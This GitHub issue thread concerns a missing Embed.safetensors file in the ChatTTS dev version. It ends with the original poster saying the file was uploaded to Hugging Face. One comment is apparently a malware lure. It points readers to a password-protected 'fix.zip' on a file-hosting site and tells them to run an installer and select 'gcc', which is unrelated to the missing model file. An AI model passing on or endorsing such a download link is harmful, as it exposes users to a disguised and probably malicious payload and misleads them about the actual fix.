### ISSUE TITLE
dev版本 FileNotFoundError: No such file or directory: "/home/ps/work/project/ChatTTS/asset/Embed.safetensors"

### ISSUE THREAD

**Issue by bingyunsky** [2noise/ChatTTS#722]

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZerRui** [comment]
dev版本 FileNotFoundError: No such file or directory: "/home/ps/work/project/ChatTTS/asset/Embed.safetensors"
您好遇到了同样的问题

**Comment by bingyunsky** [comment]
缺少的文件，已上传到huggingface了。
